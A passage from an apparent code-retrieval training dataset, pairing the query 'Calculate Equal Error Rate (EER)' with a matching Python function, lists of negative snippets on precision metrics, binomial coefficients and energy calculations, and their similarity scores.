0.\n # Cutoff r so that it is > eps.\n eps = 1e-5\n r = tf.sqrt(tf.reduce_sum(tf.square(q), axis=1) + eps)\n return tf.squeeze(0.5 * tf.reduce_sum(tf.square(p), axis=1) + k / r)", "def superobl_p(k):\n if k%2==0:\n return 1/2 + 1/(2*(k+1))\n else:\n return 1/2 + 1/(2*k)", "def choose(n, k):\r\n if 0 <= k <= n:\r\n ntok = 1\r\n ktok = 1\r\n for t in range(1, min(k, n - k) + 1):\r\n ntok *= n\r\n ktok *= t\r\n n -= 1\r\n return ntok // ktok\r\n else:\r\n return 0", "def test_kpa_conversion(self):\n\n result = get_kpa(5.6, 25)\n\n self.assertTrue(result == -34.281679)", "def pow_derpy(x, k):\n if k == 1:\n return x\n if k == 0:\n return 1\n\n return x * pow_derpy(x, k - 1)", "def k_rank_approximate(doc_matrix, k):\n return []", "def n_choose_k(n: int, k: int) -> int:\n # Edge case, no possible way to choose.\n if k > n or k < 0 or n < 0: return 0\n # We choose the min of k or n - k\n # since nCk == nC(n - k).\n k = min(k, n - k)\n # The numerator represents the product\n # n * (n - 1) * (n - 2) * ... * (n - k - 1)\n numerator = reduce(mul, range(n, n - k, -1), 1)\n # The denominator represents the product\n # 1 * 2 * ... * k\n denominator = reduce(mul, range(1, k + 1), 1)\n # return the result as an integer.\n return numerator // denominator", "def precisions(self):\n raise NotImplementedError", "def get_precision(self):\n ...", "def pk(y_true, y_pred, k):\n \n # if k is 0, return 0. we should never have this\n # as k is always >= 1\n if k == 0:\n return 0\n # we are interested only in top-k predictions\n y_pred = y_pred[:k]\n \n # convert predictions to set\n pred_set = set(y_pred)\n \n # convert actual values to set\n true_set = set(y_true)\n \n # find common values\n common_values = pred_set.intersection(true_set)\n \n # return length of common values over k\n return len(common_values) / len(y_pred[:k])", "def ranking_precision_score(y_true, y_score, k=10):\n unique_y = np.unique(y_true)\n\n if len(unique_y) > 2:\n raise ValueError(\"Only supported for two relevance levels.\")\n\n n_relevant = 0\n n_pos = 0\n for relevance_score in y_true:\n if relevance_score == 1:\n n_pos += 1\n\n for index in y_score[:k]:\n if y_true[index] == 1:\n n_relevant += 1\n\n # Divide by min(n_pos, k) such that the best achievable score is always 1.0.\n return float(n_relevant) / min(n_pos, k) if min(n_pos, k) > 0 else 0", "def kpdf(t,c,tau,k):\n return k*(1-st.gamma.cdf(t,c,loc=0,scale=tau))+(1-k*t)*st.gamma.pdf(t,c,loc=0,scale=tau)", "def __init__(self, k=10, cutoff=0.5):\n if k < 0:\n raise ValueError('k must be positive')\n super(PrecisionLower, self).__init__(k, cutoff)", "def precision(classifier_output, true_labels):\n\n # TODO: finish this.\n conf_matrix = confusion_matrix(classifier_output, true_labels)\n return conf_matrix[0][0]/(conf_matrix[0][0] + conf_matrix[1][0])", "def precision_m(self, y_true, y_pred):\n true_positives = keras.backend.sum(keras.backend.round(keras.backend.clip(y_true * y_pred, 0, 1)))\n predicted_positives = keras.backend.sum(keras.backend.round(keras.backend.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + keras.backend.epsilon())\n return precision", "def nCk(n, k):\n return factorial(n)//factorial(k)//factorial(n-k)", "def precision(y_true, y_pred):\n true_positives = backend.sum(backend.round(backend.clip(y_true * y_pred, 0, 1)))\n predicted_positives = backend.sum(backend.round(backend.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + backend.epsilon())\n return precision", "def calc(k):\n n = factorial(4*k) * (1103.0 + 26390.0*k)\n d = factorial(k)**4 * 396.0**(4.0*k)\n z = n/d\n return z", "def __init__(self, k=10, cutoff=0.5):\n if k < 0:\n raise ValueError('k must be positive')\n super(PrecisionUpper, self).__init__(k, cutoff)", "def mean_avg_prec_at_k(question_set, candidate_set, k=None):\n # TODO(umaroy): add test for this method on a known set of encodings.\n # Current run_xreqa_eval.sh with X_Y encodings generates mAP of 0.628.\n all_questions = question_set.as_list()\n all_candidates = candidate_set.as_list()\n for embedding_type in ['sentences_and_contexts']:\n candidate_matrix = np.concatenate(\n [np.expand_dims(i.encoding[embedding_type], 0) for i in all_candidates],\n axis=0)\n\n ap_scores = []\n for q in all_questions:\n question_vec = np.expand_dims(q.encoding, 0)\n scores = question_vec.dot(candidate_matrix.T)\n y_true = np.zeros(scores.shape[1])\n all_correct_cands = set(candidate_set.by_xling_id[q.xling_id])\n for ans in all_correct_cands:\n y_true[candidate_set.pos[ans]] = 1\n ap_scores.append(average_precision_at_k(\n np.where(y_true == 1)[0], np.squeeze(scores).argsort()[::-1], k))\n print(embedding_type + \": \" + str(np.mean(ap_scores)))" ]
[ "0.76427615", "0.74189496", "0.7418079", "0.72710466", "0.72456723", "0.72446615", "0.7237539", "0.72213703", "0.7210107", "0.7058935", "0.6852219", "0.6786084", "0.67836976", "0.6768417", "0.67273885", "0.67181736", "0.67181736", "0.67181736", "0.67181736", "0.67181736", "0.67181736", "0.67165935", "0.67165935", "0.67165935", "0.67165935", "0.67165935", "0.67165935", "0.67165935", "0.67165935", "0.67165935", "0.67089933", "0.66921306", "0.66757774", "0.66481805", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.6637747", "0.6631698", "0.65775067", "0.6533178", "0.6527984", "0.65041053", "0.6500147", "0.6457458", "0.6433143", "0.63926375", "0.6376261", "0.63702464", "0.63491803", "0.63410544", "0.6314881", "0.6307336", "0.62782466", "0.6258641", "0.62575054", "0.62385947", "0.6232881", "0.62196195", "0.61937124", "0.61900115", "0.61764354", "0.6156905", "0.61399555", "0.61389506", "0.6136565", "0.61267686", "0.61231154", "0.61223644", "0.61219835", "0.61058086", "0.6096785", "0.6091392", "0.60853106", "0.6082413", "0.6075436", "0.60727143", "0.60661167", "0.60641485", "0.6061439", "0.60593694", "0.6053266", "0.602791", "0.60272074", "0.6020167" ]
0.0
-1
Calculate Equal Error Rate (EER).
def calculate_eer(y, y_score, pos=1): fpr, tpr, thresholds = roc_curve(y, y_score, pos_label=pos) eer = brentq(lambda x: 1. - x - interp1d(fpr, tpr)(x), 0., 1.) thresh = interp1d(fpr, thresholds)(eer) return eer, np.float(thresh)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calculate_hr_ee(self):\n\n # HR - resting HR = net HR\n net_hr = np.array([i - self.rest_hr if i is not None else None for i in self.df_epoch[\"HR\"]])\n\n # Sets values below 0% HRR (below resting HR) to 0\n net_hr[net_hr <= 0] = 0\n\n # Equation from Brage et al., 2004. Active EE in kJ/kg/min\n kj_kg_min = [.011 * (hr ** 2) + 5.82 * hr if hr is not None else None for hr in net_hr]\n\n # Converts kJ to kcal: relative EE (kcal/kg/min)\n kcal_kg_min = [k / 4.184 if k is not None else None for k in kj_kg_min]\n\n # Converts relative EE to absolute EE (kcal/min)\n kcal_min = [k * self.weight / 1000 if k is not None else None for k in kcal_kg_min]\n\n # kcals per epoch instead of per minute\n kcal_epoch = [k * (15 / 60) for k in kcal_min]\n\n total_ee = sum([i for i in kcal_epoch if not np.isnan(i)])\n print(\"-Total energy expenditure estimated from HR is {} kcal.\".format(int(total_ee)))\n\n self.df_epoch[\"HR_EE\"] = kcal_min", "def rae(self) -> float:\n return float(np.sum(self._ae()) / (np.sum(np.abs(self.true - np.mean(self.true))) + EPS))", "def diff_of_errors(self):\n self.e_of_e = self.azimuth_error - self.altitude_error\n return self.e_of_e", "def e(self):\n\n ylow = self.e_min\n yhigh = self._e\n\n xlow = 0\n xhigh = self.anneal_max\n\n steep_mult = 8\n\n steepness = steep_mult / (xhigh - xlow)\n offset = (xhigh + xlow) / 2\n midpoint = yhigh - ylow\n\n x = np.clip(self.avg_score, 0, xhigh)\n x = steepness * (x - offset)\n e = ylow + midpoint / (1 + np.exp(x))\n return e", "def compute_EER(self, FAR, FRR):\r\n print('Computing EER')\r\n distance = abs(FAR - FRR)\r\n min_distance = min(distance)\r\n idx = np.where(distance == min_distance)\r\n return np.mean((FAR[idx] + FRR[idx]) / 2)", "def test_epe_evaluate(self):\n epe_metric = EPE()\n epe_metric.process(self.data_batch, self.data_samples)\n epe = epe_metric.evaluate(1)\n self.assertAlmostEqual(epe['EPE'], 11.5355339)", "def calculate_energy_conservation_error(self):\n assert self.data is not None\n # calculate total energy at start and end of simulation\n energy_start = self.measure_total_energy(self.t0)\n energy_end = self.measure_total_energy(self.t1)\n \n # calculate accuracy\n error = abs(1.0 - energy_start/energy_end)\n \n return error", "def _calc_Em(self):\n return (self.parameters.E0 +\n self.x * sqrt2 * self.parameters.sigma * self.mt)", "def ivrmse(self):\n return (self.model_error_iv()**2).mean()**.5", "def e(self):\n if self._e is None:\n # self._e = self.distributions.uniform(0.3,0.33)\n # return self._e\n # max is set by q but also limited by users choice of e_max.\n res_a = 29.9*((self.j[0]/self.k[0])**(2/3))\n q = self.distributions.truncated_normal(self.q_c, self.q_w, res_a*(1-0.8), res_a*(1-0.001))\n self._e = 1 - q/res_a\n return self._e", "def erf(data):\n return _make.erf(data)", "def _calculate_measurement_error(self): \n \n # Calculate Hartmann Spot\n # FIXME what are factor_1, factor_2 ???\n factor_1, factor_2 = 206265*5.89e-7, 206265*6.5e-7\n term1, term2 = factor_1/self.actuator_spacing, factor_2/self.r0\n hartmann_spot = np.max([term1, term2])\n \n # Calculate SNR \n n_pix=4 # FIXME spreadsheet says not to change this idk why?\n sample_time = 1/(10*self.controller_frequency)\n brightness = (8.9e5)*10**((0-self.guide_star_mag)/2.5)\n n_photons = brightness*sample_time*((100*self.actuator_spacing)**2)\n snr = n_photons/np.sqrt(n_photons + n_pix*(self.sigma_readnoise)**2)\n\n # Calculate noise propagator \n degrees_of_freedom = np.round((np.pi/4) * (self.telescope_diameter/self.actuator_spacing)**2)\n factor_1, factor_2 = 0.0536, 0.0795 # FIXME WHAT THE HECK IS THIS\n if self.aperture == 'circular':\n factor_1, factor_2 = 0.0068, 0.0796\n noise_propagator = np.sqrt(2*(factor_1 + factor_2*np.log(degrees_of_freedom)))\n\n # Calculate close loop averaging\n controller_over_frame = 1/10\n close_loop_averaging = np.sqrt(2*controller_over_frame)*np.arctan(1/(2*controller_over_frame))\n sigma_measurement = noise_propagator * close_loop_averaging * (self.actuator_spacing*1e9) * (hartmann_spot/snr*4.84814e-6)\n self.sigma_measurement = sigma_measurement # in nm", "def eccentricAnomaly(e, M):\n E = M if e < 0.8 else math.pi\n \n F = E - e*math.sin(M) - M\n for i in range(100):\n E = E - F/(1.0-e*math.cos(E))\n F = E - e*math.sin(E) - M\n if math.fabs(F)<1e-16:\n break\n E = mod2pi(E)\n return E", "def compute_RMSE(e):\n \"\"\"Corresponds to sqrt(2*MSE)\"\"\"\n \n return np.sqrt(2*compute_MSE(e))", "def emissivity_profile(R):\n E = R**(-3.0)*(1 - (R_in/R)**(1.0/2.0))\n return E", "def get_E(self):\r\n return self.Real.E, self.Ideal.E", "def get_E(self):\r\n return self.Real.E, self.Ideal.E", "def calculate_error(self):\n \n delta = self.Y - self.T\n error = delta.dot(delta) / self.N\n error = format(error, '.5f')\n \n self.errors.append(error)", "def euler_error(Rd, Re):\n\n nd = Rd[:, 0]\n sd = Rd[:, 1]\n ad = Rd[:, 2]\n\n ne = Re[:, 0]\n se = Re[:, 1]\n ae = Re[:, 2]\n\n return 0.5 * (np.cross(ne, nd) + np.cross(se, sd) + np.cross(ae, ad)) # eqn 3.85", "def adjust_E(self, power):\n if self.pwr_in_tot:\n fac = power/self.pwr_in_tot\n else:\n fac = 1.0\n fac = min(1.01, fac)\n self.Ey = sqrt(fac)*self.Ey", "def test_exponential_answer(self):\r\n answer = 50\r\n correct_responses = [\r\n \"50\", \"50.0\", \"5e1\", \"5e+1\",\r\n \"50e0\", \"50.0e0\", \"500e-1\"\r\n ]\r\n incorrect_responses = [\"\", \"3.9\", \"4.1\", \"0\", \"5.01e1\"]\r\n\r\n for input_str in correct_responses:\r\n result = calc.evaluator({}, {}, input_str)\r\n fail_msg = \"Expected '{0}' to equal {1}\".format(\r\n input_str, answer\r\n )\r\n self.assertEqual(answer, result, msg=fail_msg)\r\n\r\n for input_str in incorrect_responses:\r\n result = calc.evaluator({}, {}, input_str)\r\n fail_msg = \"Expected '{0}' to not equal {1}\".format(\r\n input_str, answer\r\n )\r\n self.assertNotEqual(answer, result, msg=fail_msg)", "def energy(e: float) -> float:\n\n return (1/np.sqrt(2))*(gamma(-e/2+1/2)/(gamma(-e/2+3/4)))", "def mrae(self, benchmark: np.ndarray = None):\n return float(np.mean(np.abs(self._relative_error(benchmark))))", "def calcEout(model_type): \n b, v = calcStatistics(model_type)\n return b + v", "def get_e(self):\n return self.e_min + self.e_ * self.e_range", "def inrse(self) -> float:\n return float(np.sqrt(np.sum(np.square(self._error())) / np.sum(np.square(self.true - np.mean(self.true)))))", "def uncertainty_ee(self,e1,e2):\n # reco\n unc = (self._eleRecoWeight[(e1.pt(),e1.eta())][1]/self._eleRecoWeight[(e1.pt(),e1.eta())][0] + \\\n self._eleRecoWeight[(e2.pt(),e2.eta())][1]/self._eleRecoWeight[(e2.pt(),e2.eta())][0])**2\n # id-isolation\n unc += (self._eleIdIsoWeight[(e1.pt(),e1.eta())][1]/self._eleIdIsoWeight[(e1.pt(),e1.eta())][0] + \\\n self._eleIdIsoWeight[(e2.pt(),e2.eta())][1]/self._eleIdIsoWeight[(e2.pt(),e2.eta())][0])**2\n # trigger (approximate)\n unc += (abs(self._ele8TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][1]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][1]*self._ele8TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][1]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][1])/ \\\n (self._ele8TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele8TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]))**2\n unc += ((self._ele8TrgWeight[(e1.pt(),e1.eta())][1]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele8TrgWeight[(e2.pt(),e2.eta())][1])/ \\\n (self._ele8TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele8TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]))**2\n #outcome\n return sqrt(unc)", "def calculate_wrist_ee(self):\n\n data = [i * (30 / 75) for i in self.df_epoch[\"LWrist\"]]\n\n # Modified equation from Powell et al. 2017. Removed resting component (constant = 1.15451)\n mets = [.022261 * i for i in data]\n\n # Converts METs to relative VO2 (mL O2/kg/min)\n r_vo2 = [3.5 * m for m in mets]\n\n # Converts relative VO2 to absolute VO2 (L O2/kg/min)\n a_vo2 = [i * self.weight / 1000 for i in r_vo2]\n\n # Converts absolute VO2 to kcal/min (assumes 1 L O2 -> 4.825 kcal)\n kcal_min = [a * 4.825 for a in a_vo2]\n\n # Calculates kcal/epoch\n kcal_epoch = [k * (15 / 60) for k in kcal_min]\n\n total_ee = sum([i for i in kcal_epoch if not np.isnan(i)])\n print(\"-Total energy expenditure estimated from Wrist is {} kcal.\".format(int(total_ee)))\n\n self.df_epoch[\"Wrist_EE\"] = kcal_min", "def E(self, dstrct):\n rep_votes = dstrct.rep_votes + self.properties['sen_red']\n dem_votes = dstrct.dem_votes + self.properties['sen_blue']\n\n thresh = threshold(rep_votes+dem_votes)\n rep_wasted = wasted_votes(rep_votes, thresh)\n dem_wasted = wasted_votes(dem_votes, thresh)\n gap = (rep_wasted - dem_wasted)/(rep_votes + dem_votes)\n score = 1-abs(gap)\n\n self.E_ = self.w_E * score\n return self.E_", "def rmse(self):\n return (self.model_error()**2).mean()**.5", "def E(self):\n return self.generic_getter(get_energy, \"E\", \"convert_energy\")", "def get_error_rates():\n return [ERR_RT * i for i in range(int((1 / ERR_RT) / 4))] # error up to 25%", "def ErrorCorrect(val,fEC):\n return val * fEC", "def compute_MSE(e):\n\n return 1/2*np.mean(e**2)", "def get_R_e(E, M, g_e, T_e):\n # transform energy-vector into matrices\n mat_E_x, mat_E_y = np.meshgrid(E,E) \n mat_diff = mat_E_y - mat_E_x # matrix representing: E_i - E_j\n R_e = np.ones((M,M))*g_e**2 * T_e # matrix for transition rates\n ind = np.abs(mat_diff) > 0 # indices of the non-divergent elements\n # fill in just those elements without divergences 1/0\n # the rest is set to the correct limit\n R_e[ind] = g_e**2 * mat_diff[ind]/(np.exp(mat_diff[ind]/T_e)-1)\n return R_e", "def calculate_exponent():\n pass", "def mean_error(self) -> float:\n self.ME = sum(np.array(self.sim_data[\"Human (mean)\"]) - np.array(self.sim_data[\"assigned_sim\"])) / len(self.sim_data)\n return self.ME", "def calculate_mse(e):\r\n return 1/2*np.mean(e**2)", "def rrse(self) -> float:\n return float(np.sqrt(self.rse()))", "def error(self, trainset: ([], [])):\n # MSE = Σ | d – y |^2 / n\n error_sum = 0.0\n for index, example in enumerate(trainset):\n # | d – y |^2\n output = self.activate(example[0])\n\n target = example[1][0]\n\n error = target - output\n error_sum += error ** 2\n\n # Σ |error_sum| / n\n error_sum = error_sum / len(trainset)\n return error_sum", "def energy(self):\n e = 0\n\n restoration = RestorationModel(self.graph_damaged)\n restoration.run(self.state)\n restoration_graphs = restoration.get_restoration_graphs()\n restoration_times = restoration.get_restoration_times()\n restoration_costs = restoration.get_restoration_costs()\n\n damaged = []\n damaged.append(get_delta(self.no_damage, self.initial_damage))\n\n sim_results = Parallel(n_jobs=4)(delayed(parallel_model)(\n graph, self.od_graph, self.od_matrix) for graph in restoration_graphs[:-1])\n for values in sim_results:\n damaged.append(get_delta(self.no_damage, values))\n\n for idx, values in enumerate(damaged):\n dt = restoration_times[idx] if idx == 0 else restoration_times[idx] - \\\n restoration_times[idx-1]\n e += sum(restoration_costs[idx]) + dt * (self.day_factor * values[2] * np.sum(self.mu*self.xi) +\n values[3] * np.sum(self.mu * (self.nu * self.F_w + self.rho)) + values[4] * self.upsilon)\n with open(self.fdir+'energy.csv', 'a') as f:\n f.write('\\n'+str(e))\n\n return e", "def Eee(h_in, h_out, neutron_spectrum):\n h_out.Scale(0.098)\n neutron_spectrum.Add(h_in, 1)\n neutron_spectrum.Add(h_out, -1)\n neutron_spectrum.Fit('gaus')\n #neutron_spectrum.Draw()\n #input()\n results_fit = neutron_spectrum.GetFunction('gaus')\n mean_energy = results_fit.GetParameter(1)\n spread_energy = results_fit.GetParError(1)\n return mean_energy, spread_energy", "def _Ep(self):\n return np.logspace(np.log10(self.Epmin.to('GeV').value),np.log10(self.Epmax.to('GeV').value),\n self.nEpd * (np.log10(self.Epmax/self.Epmin)))", "def eccentricity(self):\n return self.b / self.a", "def delta_energy(atom,layer1,layer2):\n global r,c,h\n return float('%.2E' % Decimal(str(r*((atom**2/layer1**2)-(atom**2/layer2**2)))))", "def calculateErrorRate(numCorrect, numWrong):\n return np.round((numWrong)/(numCorrect+numWrong),3)", "def mbe(self) -> float:\n return float(np.mean(self._error(self.true, self.predicted)))", "def erf(x):\n return 0.0", "def E_fermi(n_e):\n return n_e / nu0 # in K", "def Hydrogen_Rate(E):\n\treturn (4.0/E)*np.exp(-(2.0/3.0)/E)", "def calculate_improved_euler(self, delta_time=0.02, iterations=100):\n predator_history = []\n prey_history = []\n print self.predators\n print self.prey\n predator_history.append(self.predators)\n prey_history.append(self.prey)\n print predator_history\n print prey_history\n harvesting_effort_history = []\n print self.prey\n for i in range(iterations):\n xk_1 = self.prey_change(self.prey, self.predators) * delta_time\n yk_1 = self.predator_change(self.prey, self.predators) * delta_time\n xk_2 = self.prey_change(self.prey + xk_1, self.predators + yk_1) * delta_time\n yk_2 = self.predator_change(self.prey + xk_1, self.predators + yk_1) * delta_time\n\n\n self.prey = self.prey_change(self.prey, self.predators)\n self.predators = self.predator_change(self.prey, self.predators)\n\n predator_history.append(self.predators)\n prey_history.append(self.prey)\n\n return {'predator': predator_history, 'prey': prey_history}", "def calc_ema(self):\n emaFactor = self.settings['emaFactor']\n stepFactor = emaFactor ** self.vars['dt']\n if self.vars['step'] == 0:\n ema = float('NaN')\n elif self.vars['step'] == 1:\n ema = self.vars['speed_trace'][1]\n else:\n ema = stepFactor * self.vars['ema_trace'][self.vars['step'] - 1] + (\n 1 - stepFactor)*self.vars['speed_trace'][self.vars['step']]\n return ema", "def energy(self):\n nocc, gmo, e = self.nocc, self.gmo, self.e\n\n Ec = 0.0\n for i in range(nocc):\n for j in range(nocc):\n for a in range(nocc, len(e)):\n for b in range(nocc, len(e)):\n Ec += (1/4.0) * gmo[i, j, a, b]**2 / (e[i]+e[j]-e[a]-e[b])\n\n self.Ec = Ec\n self.E_mp2 = Ec + self.E_scf\n\n print('@MP2 correlation energy: {:15.10f}\\n'.format(self.Ec))\n print('@Total MP2 energy: {:15.10f}\\n'.format(self.E_mp2))\n\n return self.E_mp2", "def test_mcintosh_e(self):\n c = array([1,2,3,1])\n num = sqrt(15)\n den = sqrt(19)\n exp = num/den\n self.assertEqual(mcintosh_e(c), exp)", "def energy_atom(atom,layer):\n global r,c,h\n backval= r*((atom**2/layer**2))\n return float('%.2E' % Decimal(str(backval)))", "def _emiss_ep(self,Eph):\n if self.weight_ep == 0.0:\n return np.zeros_like(Eph)\n\n gam = np.vstack(self._gam)\n eps = (Eph / mec2).decompose().value\n # compute integral with electron distribution\n emiss = c.cgs * trapz_loglog(np.vstack(self._nelec) * self._sigma_1(gam,eps),\n self._gam, axis=0).to(u.cm**2 / Eph.unit)\n return emiss", "def eccentricity(self):\n new_data = self._data[['pl_pnum', 'pl_orbper', 'pl_orbsmax',\n 'pl_masse', 'pl_orbeccen',\n 'pl_radj', 'pl_dens', 'st_teff',\n 'st_mass', 'st_rad']]\n new_data = new_data.dropna()\n\n features = new_data[['pl_pnum', 'pl_orbper', 'pl_orbsmax',\n 'pl_masse',\n 'pl_radj', 'pl_dens', 'st_teff',\n 'st_mass', 'st_rad']]\n labels = new_data['pl_orbeccen']\n\n features_train, features_test, labels_train, labels_test = \\\n train_test_split(features, labels, test_size=0.2)\n\n # Create an untrained model\n model = DecisionTreeRegressor()\n\n # Train it on the **training set**\n model.fit(features_train, labels_train)\n\n # Compute test accuracy\n test_predictions = model.predict(features_test)\n test_acc = mean_absolute_error(labels_test, test_predictions)\n test_acc_r2 = r2_score(labels_test, test_predictions)\n\n # Plot ML vs Actual\n fig, [ax1, ax2] = plt.subplots(2, figsize=(15, 12))\n\n sns.distplot(test_predictions, kde=False, ax=ax1)\n sns.distplot(labels_test, kde=False, ax=ax2)\n\n ax1.set_title('Distribution of Predicted Eccentricities of Orbits')\n ax1.set_xlabel('Eccentricity of Orbit')\n ax1.set_ylabel('Number of Planets')\n\n ax2.set_title('Distribution of Actual Eccentricities of Orbits')\n ax2.set_xlabel('Eccentricity of Orbit')\n ax2.set_ylabel('Number of Planets')\n\n plt.savefig('figures/ML_Eccentricity.png', bbox_inches='tight')\n\n return (test_acc, test_acc_r2)", "def error_compute(self):\n self.tt_error = np.linalg.norm(self.rel_error)\n if self.global_rank==0:print('Overall error is::',self.tt_error)\n return {'NMF': self.rel_error, 'tt': self.tt_error}", "def get_E(self):\n return self.E", "def energy(self):\n nocc, ntot, gmo, e = self.nocc, self.ntot, self.gmo, self.e\n\n Ec = 0.0\n for i in range(nocc):\n for j in range(nocc):\n for a in range(nocc, ntot):\n for b in range(nocc, ntot):\n Ec += gmo[i, a, j, b]*(2*gmo[i, a, j, b] - gmo[i, b, j, a])/\\\n (e[i] + e[j] - e[a] - e[b])\n\n self.Ec = Ec\n self.E_mp2 = Ec + self.E_scf\n\n print('@MP2 correlation energy: {:15.10f}\\n'.format(self.Ec))\n print('@Total MP2 energy: {:15.10f}\\n'.format(self.E_mp2))\n\n return self.E_mp2", "def adjacent_error(self, field, exclude=False):\n\n self.log.info('Running the adjacent error computation for quantity %s', field)\n # If we need to exclude calculate the indices\n if exclude:\n start, end = self.get_slice(self.sims[0])\n excluded = '_excluded'\n else:\n start = 0\n end = None\n excluded = ''\n base = self.sims[0].conf['General']['results_dir']\n errpath = os.path.join(base, 'adjacenterror_%s%s.dat' % (field, excluded))\n with open(errpath, 'w') as errfile:\n self.log.info('Computing adjacent error for sweep %s', base)\n # For all other sims in the groups, compare to best estimate\n # and write to error file\n for i in range(1, self.num_sims):\n # Set reference sim\n ref_sim = self.sims[i]\n # Get the comparison vector\n vecs1, normvec = self.get_comp_vec(ref_sim, field, start, end)\n sim2 = self.sims[i - 1]\n vecs2, normvec2 = self.get_comp_vec(sim2, field, start, end)\n self.log.info(\"Computing adjacent error between numbasis %i and numbasis %i\",\n ref_sim.conf['Simulation'][ 'params']['numbasis'],\n sim2.conf['Simulation']['params']['numbasis'])\n # Get the array containing the magnitude of the difference vector at each point\n # in space\n mag_diff_vec = self.diff_sq(vecs1, vecs2)\n # Check for equal lengths between norm array and diff mag\n # array\n if len(mag_diff_vec) != len(normvec):\n self.log.error(\"The normalization vector has an incorrect number of elements!!!\")\n raise ValueError\n # Error as a percentage should be thkkk square root of the ratio of sum of mag diff vec\n # squared to mag efield squared\n error = np.sqrt(np.sum(mag_diff_vec) / np.sum(normvec))\n # self.log.info(str(error))\n errfile.write('%i,%f\\n' % (sim2.conf['Simulation']['params']['numbasis'], error))\n sim2.clear_data()\n ref_sim.clear_data()", "def _emiss_ee(self,Eph):\n if self.weight_ee == 0.0:\n return np.zeros_like(Eph)\n\n gam = np.vstack(self._gam)\n # compute integral with electron distribution\n emiss = c.cgs * trapz_loglog(np.vstack(self._nelec) * self._sigma_ee(gam,Eph),\n self._gam, axis=0)\n return emiss", "def computeEnergy(self):\n\t\tGmo = self.Gmo\n\t\te = self.e\n\t\tself.Ec = 0.0\n\n\t\tfor i in range( self.nocc ):\n\t\t\tfor j in range( self.nocc ):\n\t\t\t\tfor a in range( self.nocc,self.norb ):\n\t\t\t\t\tfor b in range( self.nocc,self.norb ):\n\t\t\t\t\t\tself.Ec += 0.25*(Gmo[i,j,a,b]*Gmo[a,b,i,j])/(e[i]+e[j]-e[a]-e[b])\n\n\t\treturn self.E0 + self.Ec", "def error_rate(dataset, estimates):\n\tincorrect = 0.0\n\tcount = 0.0\n\n\tfor idx in range(len(estimates)):\n\t\testimate = estimates[idx]\n\t\t_, actual = dataset[idx]\n\t\tfor e, a in zip(estimate, actual):\n\t\t\tcount += 1.0\n\t\t\tif e != a:\n\t\t\t\tincorrect += 1.0\n\t\n\treturn incorrect / count", "def mbrae(self, benchmark: np.ndarray = None) -> float:\n return float(np.mean(self._bounded_relative_error(benchmark)))", "def Er( z, r, epsilon, k0, w0, wp, t) :\n Er_array = \\\n epsilon * m_e*c**2/e * 2*r/w0**2 * \\\n np.exp( -r**2/w0**2 ) * np.sin( k0*z ) * np.sin( wp*t )\n return( Er_array )", "def MSE_one_error(real,estimate):\n error = mean_squared_error(real.T, estimate.T)\n return error", "def Eee2(neutron_spectrum):\n neutron_spectrum.Fit('gaus')\n results_fit = neutron_spectrum.GetFunction('gaus')\n mean_energy = results_fit.GetParameter(1)\n spread_energy = results_fit.GetParError(1)\n return mean_energy, spread_energy", "def pair_energy(self,e, s, r):\n return 4.0*e*((s/r)**12-(s/r)**6)", "def get_error_estimates(self, Y, M1, M2=None):\n # First K0 and K1\n Mminus = M1\n if M2 is None:\n Mplus = M1\n else:\n Mplus = M2\n if self.Cp0 != 0 and self.Cp1 != 0 and self.Cm != 0:\n Cp0 = self.Cp0\n Cp1 = self.Cp1\n Cm = self.Cm\n else:\n PP = self.principal_part()\n Cmax = max(PP.values())\n Kmax = 0\n for t in PP.keys():\n if isinstance(t, tuple):\n (c, l) = t\n elif isinstance(t, (int, Integer)):\n (c, l) = rn_from_D(self._space.multiplier(), t)\n else:\n raise ValueError(\"Incorrect principal part: t={0}\".format(t))\n if c in self._space.multiplier().D():\n tmp = l + self._space.multiplier().Qv[self._space.index_set().index(c)]\n elif c in range(len(self._space.multiplier().Qv)):\n tmp = l + self._space.multiplier().Qv[c]\n else:\n raise ValueError(\"Incorrect principal part: c,l={0},{1}\".format(c, l))\n if(abs(tmp) > Kmax):\n Kmax = abs(tmp)\n [Cp0, Cp1] = self._space.get_Cp(Cmax)\n Cm = self._space.get_Cm(Kmax, Cmax)\n self.Cp0 = Cp0\n self.Cp1 = Cp1\n self.Cm = Cm\n\n fak = len(self._space.index_set())\n # print \"Cp0,Cp1,Cm=\",Cp0,Cp1,Cm\n # print \"fak=\",fak\n\n er1 = fak * self._space.err_est_vv_hwmf_neg(Y, Mminus, Cm)\n er2 = fak * self._space.err_est_vv_hwmf_pos(Y, Mplus, Cp0, Cp1)\n return [er1, er2]", "def energy(self, r):\n sigma = self.params['sigma']\n epsilon = self.params['epsilon']\n s = sigma / r\n s6 = s**6; s12 = s6 * s6\n pot = 4.0 * epsilon * (s12 - s6)\n return pot", "def gmrae(self, benchmark: np.ndarray = None) -> float:\n return _geometric_mean(np.abs(self._relative_error(benchmark)))", "def 